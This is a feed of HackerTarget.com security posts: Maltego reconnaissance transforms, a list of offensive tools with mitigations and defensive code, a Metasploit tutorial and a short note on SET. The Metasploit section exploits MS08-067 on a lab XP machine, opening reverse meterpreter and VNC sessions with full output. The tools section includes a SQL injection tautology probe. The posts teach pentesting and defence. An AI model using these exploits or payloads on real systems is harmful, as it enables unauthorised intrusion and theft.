pentest – HackerTarget.com
https://hackertarget.com
Security Vulnerability Scanners and Assessments
Thu, 01 Dec 2022 23:46:07 +0000
en-US hourly 1 https://wordpress.org/?v=5.5.12

Maltego Transforms
https://hackertarget.com/maltego-transforms/
Fri, 30 Mar 2018 01:49:32 +0000
https://hackertarget.com/?p=10036

The post Maltego Transforms appeared first on HackerTarget.com.

Creating Local Maltego Transforms for our DNS reconnaissance tools has been on my to-do list for a while now. I am happy to say they are now available and it is a sweet way to perform infrastructure mapping from a domain.

What is Maltego?

Maltego is a cross-platform application for performing link analysis. Discover relationships between entities and build a visual representation of different data with a graph based layout.

A transform is a process that pulls new data related to the entity, automatically extending the graph.

Maltego is commonly used for reconnaissance in penetration testing engagements and open source intelligence analysis (OSINT). It makes it possible to understand the relationships between infrastructure, services, and even users when mapping an organisation's attack surface.

Using a Local Maltego Transform

There are two types of Transforms within Maltego: one runs on remote servers, the other runs locally on the system running Maltego. The Hacker Target Transforms are local Transforms, but the data they return is pulled remotely from the Hacker Target API.

Installing the Hacker Target Maltego Transforms

To run the transform, you need to have Python installed along with the requests module, which retrieves the data over an HTTP request. I have not tested on Windows, only on Linux, but it should work on all platforms.

The installation is straightforward. Clone (or download) the git repository, place the files in a local directory, and add the Transforms to your Maltego installation, either manually or by using the mtz file (Maltego Configuration File).

Head over to the Hacker Target GitHub page to grab the necessary files and see the detailed installation instructions.

API Quota

With no API key set, you are limited by the number of requests you can perform each day. With a HackerTarget.com Membership, this number can be increased. If you have a membership remember to add your API key to the three transform files.

What data is available

Currently, there are three transforms available, all based on host name enumeration, for the express purpose of discovering the attack surface of a target organisation.

  • GetHostNames.py - search against a domain and pull known subdomains
  • GetReverseIP.py - search against an IP address and retrieve other host records pointing to that IP
  • GetSharedDNS.py - search against a name server (NS) and get host records that point to that NS server

This can be a circular process: as new hosts are discovered, resolve them to IP addresses and perform the reverse IP search; as new domains are discovered, search against them with the host name search.
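
As an added illustration (not code from the Hacker Target repository), here is the shape a local transform such as GetHostNames.py takes once the API data is in hand: it parses "hostname,ip" records, drops anything malformed, and prints the XML that Maltego reads from the script's stdout. The "hostname,ip" response layout, the MaltegoMessage element names, the AdditionalFields layout and the maltego.DNSName entity type are assumptions made for this example, and the API reply is a constructed sample so that the script runs offline.

```python
import sys
import ipaddress
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed sample standing in for an API reply: one "hostname,ip" record per
# line (assumed response layout, not taken from the post). Two lines are
# deliberately malformed to show the parser discarding them.
SAMPLE_RESPONSE = """www.example.com,203.0.113.10
mail.example.com,203.0.113.25
vpn.example.com,203.0.113.10
not-a-record
api.example.com,999.1.1.1
"""


def parse_host_records(text):
    """Turn 'hostname,ip' lines into (hostname, ip) tuples.

    Lines that are empty, look like an API error, lack exactly one comma, or
    carry an unparsable IP are dropped, so one odd upstream line cannot put a
    bogus node on the graph."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("error"):
            continue
        parts = line.split(",")
        if len(parts) != 2:
            continue
        host, ip = parts[0].strip().lower(), parts[1].strip()
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue
        if host:
            records.append((host, ip))
    return records


def build_transform_response(records):
    """Render the XML a Maltego local transform prints to stdout (assumed
    element names): one maltego.DNSName entity per distinct host, with the
    resolved IP attached as an additional field."""
    lines = ["<MaltegoMessage>",
             " <MaltegoTransformResponseMessage>",
             "  <Entities>"]
    seen = set()
    for host, ip in records:
        if host in seen:          # a host may be listed once per IP
            continue
        seen.add(host)
        lines.append('   <Entity Type="maltego.DNSName">')
        lines.append("    <Value>%s</Value>" % escape(host))
        lines.append("    <AdditionalFields>")
        lines.append('     <Field Name="ipv4-address" DisplayName="IP Address">%s</Field>'
                     % escape(ip))
        lines.append("    </AdditionalFields>")
        lines.append("   </Entity>")
    lines += ["  </Entities>",
              " </MaltegoTransformResponseMessage>",
              "</MaltegoMessage>"]
    return "\n".join(lines)


def entity_values(xml_text):
    """Parse a response back (which proves it is well-formed) and list the
    entity values in order."""
    root = ET.fromstring(xml_text)
    return [e.findtext("Value") for e in root.iter("Entity")]


if __name__ == "__main__":
    # Maltego hands the selected entity's value to the script as argv[1].
    domain = sys.argv[1] if len(sys.argv) > 1 else "example.com"
    # Progress goes to stderr so it never pollutes the XML on stdout.
    sys.stderr.write("host search for %s\n" % domain)
    # A live transform would fetch the records here with requests; the
    # constructed sample is used instead so the script runs offline.
    print(build_transform_response(parse_host_records(SAMPLE_RESPONSE)))
```

Keeping the parser separate from the XML writer means a change in the API's reply format touches one function, and the invalid-IP check stops a stray error string from becoming a node that then feeds the reverse IP transform.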

Sounds great, but what does it look like?

Click for Demo

Conclusion

Maltego is a fun way to explore targets. Whether penetration testing, running down bug bounties, researching an organisation's infrastructure, or simply curious, Maltego provides a lot of value even from the community version and Hacker Target's Free API access.

16 Offensive Security Tools for SysAdmins
https://hackertarget.com/11-offensive-security-tools/
Tue, 27 Sep 2016 11:44:32 +0000
http://hackertarget.com/?p=3796

Security Professionals use Offensive security tools for testing and demonstrating security weaknesses. Systems Administrators and other IT professionals will benefit from having an understanding of the capabilities of these tools. Benefits include preparing systems to defend against these types of attacks and being able to identify the attacks in the case of an incident.

This selection of tools, when utilized by a moderately skilled attacker, has the potential to wreak havoc on an organization's network.

If you are interested in testing these tools, they are all available to download and use for FREE. Most are open source, with a couple of exceptions. Do not use them against systems that you do not have permission to attack. You could end up in jail.

The mitigations listed for each tool are high-level pointers to techniques that a systems administrator should consider for defending against these powerful tools. Further information can be found at the project sites for each of the tools.

While some of the recommendations may appear to be common sense, far too often the basics are overlooked.

MetaSploit Framework
Metasploit Framework - an open source tool for exploit development and penetration testing. Metasploit is well known in the security community. It has exploits for both server- and client-based attacks, with feature-packed communication modules (meterpreter) that make pwning systems fun! The framework now includes Armitage for point-and-click network exploitation. This is the go-to tool if you want to break into a network or computer system.

Defending against Metasploit:

  • Keep all software updated with the latest security patches.
  • Use strong passwords on all systems.
  • Deploy network services with secure configurations.
Ettercap
Ettercap - a suite of tools for man in the middle attacks (MITM). Once you have initiated a man in the middle attack with Ettercap, use the modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords are just the beginning; inject to exploit FTW!

Defending against Ettercap:

  • Understand that ARP poisoning is not difficult in a typical switched network.
  • Lock down network ports.
  • Use secure switch configurations and NAC where the risk warrants it.
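
The first bullet is worth making concrete. The following detector is an added example, not part of the original post, and reads a constructed log of ARP replies in an assumed "<time> reply <ip> is-at <mac>" layout; it flags the two signatures an Ettercap-style poisoning leaves on the wire: a known IP (particularly the gateway) suddenly bound to a different MAC, and one MAC answering for several IPs.

```python
import re
from collections import defaultdict

# Constructed sample of ARP replies in a simple "<time> reply <ip> is-at <mac>"
# layout (not a real capture). The early lines establish normal bindings; the
# last two show one MAC (...:21) answering for the gateway and for another host.
SAMPLE_ARP_LOG = """\
10:00:01 reply 192.168.1.1 is-at 00:11:22:33:44:01
10:00:02 reply 192.168.1.20 is-at 00:11:22:33:44:20
10:00:03 reply 192.168.1.21 is-at 00:11:22:33:44:21
10:00:09 reply 192.168.1.1 is-at 00:11:22:33:44:21
10:00:10 reply 192.168.1.20 is-at 00:11:22:33:44:21
"""

LINE_RE = re.compile(
    r"^(\S+)\s+reply\s+(\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})$",
    re.IGNORECASE)


def detect_arp_anomalies(log_text, gateway_ip=None):
    """Walk the log in order and return alert strings for two symptoms of
    ARP poisoning:
      1. an IP whose MAC binding changes (HIGH when it is the gateway);
      2. a MAC that starts answering for more than one IP."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, ip, mac = m.group(1), m.group(2), m.group(3).lower()

        # Symptom 1: the IP was already bound to a different MAC.
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            sev = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append(f"{ts} {sev}: {ip} moved from {prev} to {mac}")
        ip_to_mac[ip] = mac

        # Symptom 2: alert only when this MAC's set of claimed IPs grows past one,
        # so a repeated, legitimate reply does not re-trigger the alert.
        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > max(before, 1):
            alerts.append(f"{ts} MEDIUM: {mac} now claims {sorted(mac_to_ips[mac])}")
    return alerts
```

In practice the bindings for the gateway and other critical hosts would be seeded from a known-good table rather than learned from the first reply seen, since the first reply observed after a sensor starts could already be the poisoned one.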
SSLStrip
sslstrip - using HTTPS makes people feel warm, fuzzy, and secure. With sslstrip, this security can be attacked, downgrading the connection to an unencrypted HTTP session in which all the traffic is readable. Banking details, passwords, and emails from your boss, all in the clear. It even includes a nifty feature where the favicon on the unencrypted connection is replaced with a padlock, just to keep the user feeling warm and fuzzy.

Defending against sslstrip:

  • Be aware of the possibility of MITM attacks (arp, proxies / gateway, wireless).
  • Look for sudden protocol changes in the browser address bar. Not really a technical mitigation!
Evilgrade
evilgrade - another man in the middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the upgrade and provides the user with a not-so-good update. It can exploit the upgrade functionality of around 63 pieces of software, including Opera, Notepad++, VMware, VirtualBox, iTunes, QuickTime and Winamp! It really whips the llama's ass!

Defending against evilgrade:

  • Be aware of the possibility of MITM attacks (arp attacks, proxy / gateway, wireless).
  • Only perform updates to your system or applications on a trusted network.
Social Engineer Toolkit
Social Engineer Toolkit - makes creating a social-engineered client-side attack way too easy. It creates the spear phish, sends the email and serves the malicious exploit. SET is the open source client-side attack weapon of choice.

Defending against SET:

  • User awareness training around spear phishing attacks.
  • Strong Email and Web filtering controls.
SQLmap
sqlmap - SQL injection is an attack vector that has been around for over 10 years, yet it is still the easiest way to get dumps of entire databases of information. sqlmap is not only a highly accurate tool for detecting SQL injection, but also has the capability to dump information from the database and even to launch attacks that can result in operating system shell access on the vulnerable system.

Defending against sqlmap:

  • Filter all input on dynamic websites (secure the web applications).
  • Use mod_proxy or other web-based filtering controls to help block malicious injection attacks (not ideal, as these web application firewalls (WAF) can often be bypassed).
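
An added example (not from the post) of what "secure the web applications" means in code: the same lookup written with string concatenation, which sqlmap would flag, and with a bound parameter, which a quote in the input cannot subvert, plus an allow-list on the input as defence in depth. The users table and the probe string are constructed for the example.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory users table (sample data, not from the post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.com"),
         ("bob", "bob@example.com"),
         ("carol", "carol@example.com")])
    return conn


def lookup_vulnerable(conn, username):
    """The injectable pattern: user input is pasted into the SQL text, so a
    quote in it changes the structure of the statement."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """The fix: a bound parameter is sent as data and never parsed as SQL."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def is_valid_username(value):
    """Input allow-list (defence in depth, not a replacement for binding):
    lowercase letters, digits and underscore, 1 to 32 characters."""
    return re.fullmatch(r"[a-z0-9_]{1,32}", value) is not None


def demo():
    """Run the classic tautology probe through both queries and return the
    row counts: the concatenated query leaks every row, the bound one none."""
    conn = make_db()
    probe = "x' OR '1'='1"
    return len(lookup_vulnerable(conn, probe)), len(lookup_parameterized(conn, probe))
```

The allow-list is the cheap first line that a WAF tries to approximate from the outside; the bound parameter is the control that actually removes the injection, because the database driver never lets the value reach the SQL parser.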
Aircrack-NG
aircrack-ng - breaking holes in wireless networks for fun and profit. A suite of tools that enables all manner of wireless network attacks.

Defending against aircrack-ng:

  • Never use WEP.
  • When using WPA2 with pre-shared keys, ensure passwords are strong (10+ characters non-dictionary based passwords).
oclHashcat
oclHashcat - Need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. Over 48 different hashing algorithms are supported. It will use the GPU (if supported) on your graphics card to crack those hashes many times faster than your clunky old CPU.

Defending against oclHashcat:

  • Passwords are the weakest link. Enforce password complexity.
  • Protect the hashed passwords.
  • Salt the hashes.
ncrack
ncrack - Brute force network passwords with this tool from Fyodor, the creator of Nmap. Passwords are the weakest link, and ncrack makes it easy to brute force passwords for RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, and telnet.

Defending against ncrack:

  • Use strong passwords everywhere.
  • Implement time based lockouts on network service password failures.
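
An added example (not the post's own code) of the second bullet: a throttle that counts failed logins per account and source within a sliding window and refuses further attempts for a fixed period once the threshold is hit, which is what turns a fast online guessing run into a handful of attempts per lockout period. Threshold, window and lockout lengths are assumed values.

```python
import time
from collections import defaultdict, deque


class LoginThrottle:
    """Failure counter with a time-based lockout.

    Failures are keyed on (account, source) so a guessing tool working one
    account from one address trips quickly, while a real user's typo from
    elsewhere does not. Timestamps can be passed in explicitly so the logic
    can be exercised without sleeping."""

    def __init__(self, max_failures=5, window_seconds=60, lockout_seconds=300):
        self.max_failures = max_failures
        self.window = window_seconds
        self.lockout = lockout_seconds
        self.failures = defaultdict(deque)   # key -> timestamps of recent failures
        self.locked_until = {}               # key -> time at which the lockout ends

    def is_locked(self, key, now):
        until = self.locked_until.get(key)
        if until is None:
            return False
        if now >= until:                     # lockout has expired
            del self.locked_until[key]
            return False
        return True

    def attempt(self, key, password_ok, now=None):
        """Record one login attempt and return 'ok', 'fail' or 'locked'.
        While locked the outcome is 'locked' whatever the password was, so
        the caller should check this before doing any credential work."""
        now = time.monotonic() if now is None else now
        if self.is_locked(key, now):
            return "locked"
        if password_ok:
            self.failures.pop(key, None)     # a success clears the count
            return "ok"
        recent = self.failures[key]
        while recent and now - recent[0] > self.window:
            recent.popleft()                 # forget failures outside the window
        recent.append(now)
        if len(recent) >= self.max_failures:
            self.locked_until[key] = now + self.lockout
            recent.clear()
            return "locked"
        return "fail"
```

Keying on account plus source means a distributed run against one account still needs a lockout per source; pairing this with a per-account counter, and logging every "locked" result, gives the blue team the signal the attack otherwise leaves as a quiet stream of 401s.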
Cain and Abel
Cain and Abel - Cracking passwords, sniffing VoIP and Man in the Middle (MITM) attacks against RDP are just a few examples of the many features of this Windows-only tool.

Defending against Cain and Abel:

  • Be aware of the possibility of MITM attacks (arp attacks, untrusted proxy / gateway, wireless).
  • Use strong passwords everywhere.
Tor Network
Tor - push your traffic through this onion network, which is designed to provide anonymity to the user. Note that your traffic from the exit node is not encrypted or secured. Make sure you understand what it does before using it: Tor provides anonymity, not encrypted communication.

Defending against Tor:

  • It is possible to implement blocking of Tor exit nodes on your firewall, if Tor traffic is linked to a threat to your environment.
Binwalk
Binwalk - a fast way to analyse firmware images. Using binwalk you are able to extract files, identify compression, extract compressed files, and search binaries for strings. For an attacker it helps in the search for hard-coded passwords, API keys, and other key pieces of information in firmware images.

Defending against Binwalk:

  • Don't leave plain text hard coded passwords, API keys and other back doors in your firmware.
Cobalt Strike
Cobalt Strike (Commercial) - Billed as software for adversary simulations and red team operations. It is essentially an exploitation tool like Metasploit, but with a focus on lateral movement (tunnelling commands through multiple pivot points) and C2 (command and control). Check out the videos for interesting examples of Cobalt Strike in use.

Defending against Cobalt Strike:

  • Advanced attackers need to be discovered by advanced blue teams, with solid network analysis capabilities and well-defended networks.
Canvas - Immunity
Canvas (Commercial) - Another exploitation framework with advanced capabilities for pivoting and lateral movement. It can be used with another Immunity product, Innuendo, which is billed as a post-compromise implant framework. With these tools an attacker can simulate an advanced adversary from initial compromise all the way to persistent network access and data exfiltration.

Defending against Canvas:

  • Similar to Cobalt Strike, you will need to have your house in order as a blue team to detect an attacker using these tools.
Mimikatz
Mimikatz - A well known tool to extract passwords and NTLM hashes from Windows memory. This tool will be used by an attacker once they are able to execute code on the system.

Defending against Mimikatz:

  • There are a number of tweaks that can be made to Windows Local Security Policy and Active Directory to limit the effectiveness of Mimikatz. Like many things in infosec, these techniques often come down to an arms race between the attacker and the defenders.
Zmap & Masscan
Zmap & masscan - When it comes to port scanners, the one at the top is no doubt Nmap; it is a utility that everyone should have available. When it comes to large-scale scanning, Zmap and masscan are two newer tools that are crazy fast: fast enough to scan the whole IPv4 internet.

Defending against Zmap & Masscan:

If you are interested in testing these offensive security tools, take a look at the Kali Linux distribution. It includes many of these and other tools pre-installed.

These tools are used by security professionals around the world to demonstrate security weakness.

Updated 11th December 2018. Now includes 16 offensive security tools.

Warning
Only experiment on your local network where you have permission. Do not do anything stupid. You could end up in jail.

Have you seen our other Free IP and Network Testing tools?

Discover. Explore. Learn.

Next level testing with advanced Security Vulnerability Scanners.

Trusted tools. Hosted for easy access.

Metasploit 3.4.0 on Ubuntu 10.04 a quick introduction
https://hackertarget.com/metasploit-3-4-0-on-ubuntu-10-04-a-quick-introduction/
Wed, 02 Jun 2010 05:56:47 +0000
http://hackertarget.com/?p=568

Perhaps you have heard of Metasploit. It is a very powerful exploitation framework developed by HD Moore.

Solid growth has seen an early version that was a few exploits in a Perl-based wrapper turn into a Ruby-coded framework that is competing with Core Impact and Canvas in the pen-testing community.

Here is a quick and dirty introduction to running it on Ubuntu Linux 10.04. Of course it will run just as easily on Fedora Linux, Windows or whatever Operating System floats your boat.

Download the framework from https://www.metasploit.com/get-started

I chose the binary version for 64 bit Linux.

Ruby is not installed by default in Ubuntu, so start off with:

apt-get install ruby
chmod +x framework-3.4.0-linux-x86_64.run
./framework-3.4.0-linux-x86_64.run
Verifying archive integrity... All good.
Uncompressing Metasploit Framework v3.4.0-release Installer (64-bit)........


                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888

Metasploit Framework v3.4.0 Release
    Report Bugs: msfdev@metasploit.com


Warning: A copy of Metasploit already exists at /opt/metasploit3
         continuing this installation will DELETE the previous  
         install, including all user-modified files.

Please enter 'yes' to continue or any other key to abort
Continue (yes/no) > yes

This installer will place Metasploit into the /opt/metasploit3 directory.
Continue (yes/no) > yes
Removing files from the previous installation...

Extracting the Metasploit operating environment...

Extracting the Metasploit Framework...

Installing links into /usr/local/bin...

Installation complete.

Would you like to automatically update Metasploit?
AutoUpdate? (yes/no) > yes


*** snip ***

Updated to revision 9390.

Launch the Metasploit console by running 'msfconsole'

Exiting the installer...
root@testbox:/home/testuser/Downloads# msfconsole

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|


       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 264 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
       =[ svn r9390 updated today (2010.06.01)

msf > exit

We have a working Metasploit, hoorah for us.

Exploit

Let's do a quick exploit of a Windows XP SP2 test machine I have on my network. It is running in Sun VirtualBox using Host Only Networking, as we will see shortly.

I like to use the command line utility for msf (msfcli), as once you get used to the syntax it is easier and faster. However, if you prefer, go with msfconsole.

Running #msfcli will list all exploits, payloads and other modules.

#msfcli | grep 08_067
exploit/windows/smb/ms08_067_netapi

Let's hit my Windows box with exploit/windows/smb/ms08_067_netapi; it is stable and works very well.

#msfcli  exploit/windows/smb/ms08_067_netapi
[*] Please wait while we load the module tree...
Usage: /opt/metasploit3/msf3/msfcli   [mode]
========================================================================

    Mode           Description
    ----           -----------
    (H)elp         You're looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module

#msfcli  exploit/windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Running the following will display all payloads that will work with ms08_067_netapi. I have selected two in the following examples: a reverse meterpreter and a VNC reverse DLL injection.

#msfcli exploit/windows/smb/ms08_067_netapi P

My Windows box is 192.168.56.101 and my local Ubuntu system is 192.168.56.1.

# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.56.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748032 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050)

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] 	Possible countermeasure found avgemc.exe C:\Program Files\AVG\AVG9\avgemc.exe
[*] Getting Windows Built in Firewall configuration...
[*] 	
[*] 	Domain profile configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	Exception mode                    = Enable
[*] 	
[*] 	Standard profile configuration (current):
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Disable
[*] 	Exception mode                    = Enable
[*] 	
[*] 	Local Area Connection firewall configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	
[*] 	Local Area Connection 2 firewall configuration:
[*] 	-------------------------------------------------------------------
[*] 	Operational mode                  = Enable
[*] 	
[*] Checking DEP Support Policy...
meterpreter > run get_local_subnets
Local subnet: 10.0.2.0/255.255.255.0
Local subnet: 192.168.56.0/255.255.255.0
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Get as many privileges as possible
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter >  pwd
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > cd ..
meterpreter > pwd
C:\
meterpreter >  ls

Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
40777/rwxrwxrwx   0          dir   2009-12-22 05:59:31 +1100  $AVG
100777/rwxrwxrwx  0          fil   2009-12-22 05:39:51 +1100  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2009-12-22 05:39:51 +1100  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2010-02-12 15:23:25 +1100  Documents and Settings
100444/r--r--r--  0          fil   2009-12-22 05:39:51 +1100  IO.SYS
40777/rwxrwxrwx   0          dir   2010-02-11 13:11:43 +1100  Inetpub
100444/r--r--r--  0          fil   2009-12-22 05:39:51 +1100  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2004-08-04 22:00:00 +1000  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2010-04-08 15:57:51 +1000  Program Files
40777/rwxrwxrwx   0          dir   2010-04-09 13:14:56 +1000  RECYCLER
40777/rwxrwxrwx   0          dir   2009-12-22 05:43:08 +1100  System Volume Information
40777/rwxrwxrwx   0          dir   2010-04-09 13:18:19 +1000  WINDOWS
100666/rw-rw-rw-  211        fil   2009-12-22 05:35:20 +1100  boot.ini
100444/r--r--r--  250032     fil   2004-08-04 22:00:00 +1000  ntldr
100666/rw-rw-rw-  301989888  fil   2010-06-01 02:21:17 +1000  pagefile.sys

The power of the meterpreter is really only limited by your imagination: keylogging, screen captures, adding accounts, dumping the hashes to be cracked offline...

A VNC injection

# msfcli  exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/vncinject/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.56.1:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "snipped"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1062)

This should pop up a VNC session with full desktop control of your Windows XP SP2 host. This is a dramatic way to show people the power of Metasploit and to reinforce the need for patching to your users.

I did a recent demonstration to a group of corporate helpdesk operators and they were quite surprised at just how easy it can be.

SET Social Engineering Toolkit
https://hackertarget.com/set-social-engineering-toolkit/
Wed, 05 May 2010 09:35:29 +0000
http://hackertarget.com/?p=565

This tool, and guide to using the tool, is an example of how easy client based exploitation has become. When it comes down to it, attacking the client is fast becoming the easiest method to perform a targeted attack against an organisation or company.

For our readers who are not familiar with Metasploit this may be a little advanced. However, you should still be aware of how relatively easy this sort of attack can be. After all, the weakest point in most organisations is the end user.

The guys at offensive-security.com have put Metasploit training online, including a guide to the Social Engineering Toolkit (SET). It is a good step-by-step tutorial on using the tool and exploiting clients.

Depending on the guidelines of your Pen-Test, attacking the client is often a valuable entry point into the entire network. Frankly, once you get the client there is little stopping you from taking the whole network.

SET Social Engineering Toolkit
